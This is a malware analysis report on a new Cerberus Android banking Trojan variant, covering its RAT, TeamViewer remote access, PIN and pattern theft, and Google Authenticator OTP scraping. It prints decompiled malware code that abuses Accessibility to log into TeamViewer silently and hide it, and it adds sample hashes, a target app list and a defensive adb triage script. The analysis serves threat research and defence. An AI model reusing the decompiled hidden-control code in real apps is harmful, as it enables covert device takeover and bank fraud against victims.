Cerberus
The Cerberus banking Trojan, which appeared on the threat landscape at the end of June 2019, has taken over from the infamous Anubis Trojan as the major rented banking malware. While its feature set already enabled successful exfiltration of personally identifiable information (PII) from infected devices, Cerberus still lacked features that would lower the detection barrier when the stolen information is abused for fraud: a login or transaction performed from the victim's own device is far less likely to be flagged than one from an attacker's machine. In mid-January 2020 the Cerberus authors came back with a new variant that addresses that gap, a RAT feature to perform fraud directly from the infected device.
This new Cerberus variant has undergone a refactoring of the code base and updates to the C2 communication protocol, but most notably it has been enhanced with RAT capability, the ability to steal the device's screen-lock credentials (PIN code or swipe pattern) and the theft of 2FA tokens from the Google Authenticator application.
The RAT service is able to traverse the device's file system and download its contents. On top of that it can launch TeamViewer and set up a connection to it, giving the threat actors full remote access to the device.
Once TeamViewer is working, it gives the actors many possibilities, including changing device settings, installing or removing apps and, most notably, using any app on the device (such as banking apps, messengers and social network apps). It can also provide valuable insight into the victim's behavior and habits should it be used for espionage purposes.
The following snippet shows the code responsible for TeamViewer login and initialization:
```java
// Decompiled Cerberus Accessibility-service handler (field and variable names as
// recovered by the analyst). `event` is the AccessibilityEvent being processed and
// AcccesibilityUtils.getNodeFromEvent resolves a view by resource id inside the
// event's window. The original listing read `getNodeFromEvent.contains(...)` on the
// first condition, which cannot compile; the intended check is on the package name
// of the foreground app.
String runningPackage = this.lowerPkgName;
if (runningPackage.contains("com.teamviewer.host.market")) {
    AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event,
            "com.teamviewer.host.market:id/host_assign_device_username");
    AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event,
            "com.teamviewer.host.market:id/host_assign_device_password");
    AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event,
            "com.teamviewer.host.market:id/host_assign_device_submit_button");

    // The TeamViewer account credentials are read from SharedPreferences once the
    // "assign device" form is on screen, the fill/submit state is reset, and the
    // stored values are wiped.
    if (username != null) {
        this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);
        if (!this.teamviewerUsername.isEmpty()) {
            this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);
            this.credsSubmitted = false;
            this.passwordFilled = false;
            this.userFilled = false;
            this.permissionStatus = 0;
            this.utils.writeShPrStr(this, this.strings.connect_teamviewer, "");
            this.utils.writeShPrStr(this, this.strings.password, "");
        }
    }

    // Auto-accept the TeamViewer Host permission dialog and, on Samsung devices, the
    // Knox license agent (com.samsung.klmsagent) prompt, then relaunch TeamViewer.
    if (this.permissionStatus == 0) {
        AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent(event,
                "com.teamviewer.host.market:id/action_bar_root");
        if (v7_7 != null && AcccesibilityUtils.getNodeFromEvent(event,
                "com.teamviewer.host.market:id/buttonPanel") != null) {
            this.permissionStatus = 1;
            AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, "android:id/button1");
            if (tmButton != null) {
                this.acc_utils.clickButton(tmButton);
            }
            AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event,
                    "com.samsung.klmsagent:id/checkBox1");
            AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event,
                    "com.samsung.klmsagent:id/btn_confirm");
            if (klmCheckBox != null && this.permissionStatus == 1) {
                this.acc_utils.clickButton(klmCheckBox);
                this.acc_utils.clickButton(klmConfirm);
                this.permissionStatus = 2;
                Utils utils = this.utils;
                utils.launchPkg(this, "com.teamviewer.host.market");
            }
        }
    }

    // Type the credentials into the form through the Accessibility API and submit.
    if (!this.teamviewerUsername.isEmpty() && !this.teamviewerPassord.isEmpty()) {
        if (username != null && !this.userFilled) {
            this.acc_utils.setInput(username, this.teamviewerUsername);
            this.userFilled = true;
        }
        if (password != null && !this.passwordFilled) {
            this.acc_utils.setInput(password, this.teamviewerPassord);
            this.passwordFilled = true;
        }
        if (this.userFilled && this.passwordFilled && !this.credsSubmitted) {
            this.permissionStatus = 0;
            this.acc_utils.clickButton(submit);
            this.credsSubmitted = true;
            // When the "hidden" flag is set, navigate away so the victim does not
            // see the TeamViewer window.
            String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);
            if (v0_9.equals("true")) {
                this.goBack();
            }
        }
    }
}
```
The feature enabling theft of the device's screen-lock credentials (PIN and lock pattern) is powered by a simple overlay that asks the victim to unlock the device; whatever the victim enters into the overlay is captured by the Trojan. From the implementation of the RAT we can conclude that this screen-lock credential theft was built so that the actors can remotely unlock the device and perform fraud while the victim is not using it. This once more shows the creativity of criminals in building the right tools to be successful.
Abusing its Accessibility privileges, the Trojan can now also steal 2FA codes from the Google Authenticator application. When the app is running, the Trojan reads the content of its interface (the OTP codes shown on screen) through the Accessibility service and sends it to the C2 server. Once again, we can deduce that this functionality will be used to bypass authentication services that rely on OTP codes.
[Figure omitted: screenshot of the Google Authenticator application]
As of the end of February 2020, these features have not yet been advertised on underground forums. We therefore believe that this variant of Cerberus is still in a test phase but might be released soon. With an exhaustive target list covering institutions from all over the world, combined with its new RAT capability, Cerberus is a critical risk for financial institutions offering online banking services. Whether an institution is on the target list or not, it is easy for the operators to extend the list to target additional apps (refer to the appendix for the current target list).
Samples
SHA-256 |
---|
c3adb0a1a420af392de96b1150f0a23d8826c8207079e1dc268c07b763fe1af7 |
4ff95cadf83b47d1305f1deb4315e6387c4c0d58a0bdd12f74e866938c48baa5 |
9d4ce9cce72ec64761014aecbf1076041a8d790771fa8f8899bd3e2b2758281d |
Target list
Package name | App name |
---|---|
au.com.nab.mobile | NAB Mobile Banking |
com.IngDirectAndroid | ING Direct France |
com.abnamro.nl.mobile.payments | ABN AMRO Mobiel Bankieren |
com.akbank.android.apps.akbank_direkt | Akbank Direkt |
com.android.vending | Google Play Store |
com.att.myWireless | myAT&T |
com.bankinter.launcher | Bankinter Móvil |
com.bbva.bbvacontigo | BBVA Spain |
com.bmo.mobile | BMO Mobile Banking |
com.boursorama.android.clients | Boursorama Banque |
com.caisseepargne.android.mobilebanking | Banque |
com.chase.sig.android | Chase Mobile |
com.cibc.android.mobi | CIBC Mobile Banking® |
com.clairmail.fth | Fifth Third Mobile Banking |
com.cm_prod.bad | Crédit Mutuel |
com.coinbase.android | Coinbase - Buy Bitcoin & more. Secure Wallet. |
com.commbank.netbank | CommBank |
com.connectivityapps.hotmail | Connect for Hotmail |
com.csam.icici.bank.imobile | iMobile by ICICI Bank |
com.db.mm.norisbank | norisbank App |
com.db.pbc.miabanca | La Mia Banca |
com.finansbank.mobile.cepsube | QNB Finansbank Cep Şubesi |
com.finanteq.finance.ca | CA24 Mobile |
com.garanti.cepsubesi | Garanti Mobile Banking |
com.google.android.gm | Gmail |
com.grppl.android.shell.CMBlloydsTSB73 | Lloyds Bank Mobile Banking |
com.grppl.android.shell.halifax | Halifax: the banking app that gives you extra |
com.infonow.bofa | Bank of America Mobile Banking |
com.konylabs.capitalone | Capital One® Mobile |
com.kutxabank.android | Kutxabank |
com.kuveytturk.mobil | Mobil Şube |
com.latuabancaperandroid | Intesa Sanpaolo Mobile |
com.mail.mobile.android.mail | mail.com mail |
com.microsoft.office.outlook | Microsoft Outlook |
com.pozitron.iscep | İşCep |
com.rbc.mobile.android | RBC Mobile |
com.rsi | ruralvía |
com.sbi.SBIFreedomPlus | SBI Anywhere Personal |
com.starfinanz.smob.android.sfinanzstatus | Sparkasse Ihre mobile Filiale |
com.suntrust.mobilebanking | SunTrust Mobile App |
com.targo_prod.bad | TARGOBANK Mobile Banking |
com.teb | CEPTETEB |
com.tmobtech.halkbank | Halkbank Mobil |
com.unicredit | Mobile Banking UniCredit |
com.usaa.mobile.android.usaa | USAA Mobile |
com.usbank.mobilebanking | U.S. Bank |
com.vakifbank.mobile | VakıfBank Mobil Bankacılık |
com.wf.wellsfargomobile | Wells Fargo Mobile |
com.yahoo.mobile.client.android.mail | Yahoo Mail – Stay Organized |
com.ykb.android | Yapı Kredi Mobile |
com.ziraat.ziraatmobil | Ziraat Mobil |
de.comdirect.android | comdirect mobile App |
de.commerzbanking.mobil | Commerzbank Banking App |
de.consorsbank | Consorsbank |
de.dkb.portalapp | DKB-Banking |
de.fiducia.smartphone.android.banking.vr | VR-Banking |
de.postbank.finanzassistent | Postbank Finanzassistent |
es.bancosantander.apps | Santander |
es.cm.android | Bankia |
es.evobanco.bancamovil | EVO Banco móvil |
es.ibercaja.ibercajaapp | Ibercaja |
es.lacaixa.mobile.android.newwapicon | CaixaBank |
es.univia.unicajamovil | UnicajaMovil |
eu.unicreditgroup.hvbapptan | HVB Mobile B@nking |
finansbank.enpara | Enpara.com Cep Şubesi |
fr.banquepopulaire.cyberplus | Banque Populaire |
fr.creditagricole.androidapp | Ma Banque |
fr.lcl.android.customerarea | Mes Comptes - LCL |
it.bnl.apps.banking | BNL |
it.copergmps.rt.pf.android.sp.bmps | Banca MPS |
it.ingdirect.app | ING DIRECT Italia |
it.nogood.container | UBI Banca |
it.popso.SCRIGNOapp | SCRIGNOapp |
jp.co.rakuten_bank.rakutenbank | 楽天銀行 -個人のお客様向けアプリ |
mobi.societegenerale.mobile.lappli | L'Appli Société Générale |
org.stgeorge.bank | St.George Mobile Banking |
pe.com.interbank.mobilebanking | Interbank APP |
piuk.blockchain.android | Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum |
pl.mbank | mBank PL |
pl.pkobp.iko | IKO |
posteitaliane.posteapp.apppostepay | Postepay |
com.facebook.katana | Facebook |
com.instagram.android | Instagram |
com.paypal.android.p2pmobile | PayPal Cash App: Send and Request Money Fast |
com.snapchat.android | Snapchat |
com.twitter.android | Twitter |
com.viber.voip | Viber Messenger |
com.whatsapp | WhatsApp Messenger |
org.telegram.messenger | Telegram |
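The Accessibility abuse described above (driving TeamViewer Host, scraping Google Authenticator) and the target list in this appendix both give a first responder concrete things to check on a suspect handset. The script below is an added example, not code from this report or from the malware: it parses the output of two adb commands, `adb shell settings get secure enabled_accessibility_services` and `adb shell pm list packages`, flags any enabled accessibility service outside an assumed allow-list, notes whether TeamViewer Host is installed, and reports which installed apps appear in the Cerberus target list. The allow-list, the sample command output and the package name `com.example.unknownapp` are constructed for the example; the target set is a subset of the appendix above.

```python
"""Triage helper for an Android device suspected of a Cerberus infection.

Added example code: the allow-list, sample adb output and the package
com.example.unknownapp are constructed for illustration.
"""
from __future__ import annotations

# Subset of the Cerberus target list from the appendix (package names only).
CERBERUS_TARGETS = {
    "au.com.nab.mobile", "com.abnamro.nl.mobile.payments", "com.android.vending",
    "com.chase.sig.android", "com.coinbase.android", "com.google.android.gm",
    "com.paypal.android.p2pmobile", "com.whatsapp", "de.commerzbanking.mobil",
    "es.bancosantander.apps", "org.telegram.messenger",
}

# Assumed allow-list: accessibility services expected on the fleet being triaged.
KNOWN_ACCESSIBILITY_SERVICES = {
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService",
}

TEAMVIEWER_HOST = "com.teamviewer.host.market"

# Constructed sample output of `settings get secure enabled_accessibility_services`:
# colon-separated `package/ServiceClass` entries; a class starting with '.' is
# relative to its package. The setting reads "null" when nothing is enabled.
SAMPLE_ENABLED_SERVICES = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService"
    ":com.example.unknownapp/.AccService"
)

# Constructed sample output of `pm list packages` (one `package:<name>` per line).
SAMPLE_PM_OUTPUT = """package:com.android.vending
package:com.google.android.gm
package:com.chase.sig.android
package:com.teamviewer.host.market
package:com.example.unknownapp
package:com.whatsapp
"""


def parse_enabled_services(value: str) -> list[tuple[str, str]]:
    """Return (package, fully qualified service class) pairs from the setting value."""
    services = []
    for entry in value.strip().split(":"):
        entry = entry.strip()
        if not entry or entry == "null":
            continue
        pkg, _, cls = entry.partition("/")
        if cls.startswith("."):
            cls = pkg + cls
        services.append((pkg, cls))
    return services


def parse_pm_list(output: str) -> set[str]:
    """Return the set of installed package names from `pm list packages` output."""
    packages = set()
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            packages.add(line[len("package:"):])
    return packages


def triage(enabled_services_value: str, pm_output: str) -> dict:
    """Cross-check enabled accessibility services and installed apps against
    the allow-list and the Cerberus target list."""
    services = parse_enabled_services(enabled_services_value)
    unknown = sorted(f"{pkg}/{cls}" for pkg, cls in services
                     if f"{pkg}/{cls}" not in KNOWN_ACCESSIBILITY_SERVICES)
    installed = parse_pm_list(pm_output)
    targeted = sorted(installed & CERBERUS_TARGETS)
    teamviewer = TEAMVIEWER_HOST in installed
    # An unexpected accessibility service is the strongest signal: every Cerberus
    # capability above (overlay, TeamViewer automation, OTP scraping) depends on it.
    if unknown:
        verdict = "investigate: unknown accessibility service enabled"
    elif teamviewer:
        verdict = "review: TeamViewer Host present, confirm it is sanctioned"
    else:
        verdict = "no accessibility-abuse indicators"
    return {
        "unknown_accessibility_services": unknown,
        "teamviewer_host_installed": teamviewer,
        "targeted_apps_installed": targeted,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_ENABLED_SERVICES, SAMPLE_PM_OUTPUT).items():
        print(f"{key}: {val}")
```

On a real device, pipe the two adb commands' output into `triage`; an enabled service from a package that is not an accessibility tool you deployed is the indicator to act on, regardless of whether any targeted app is installed, because the target list is trivially extended by the operators.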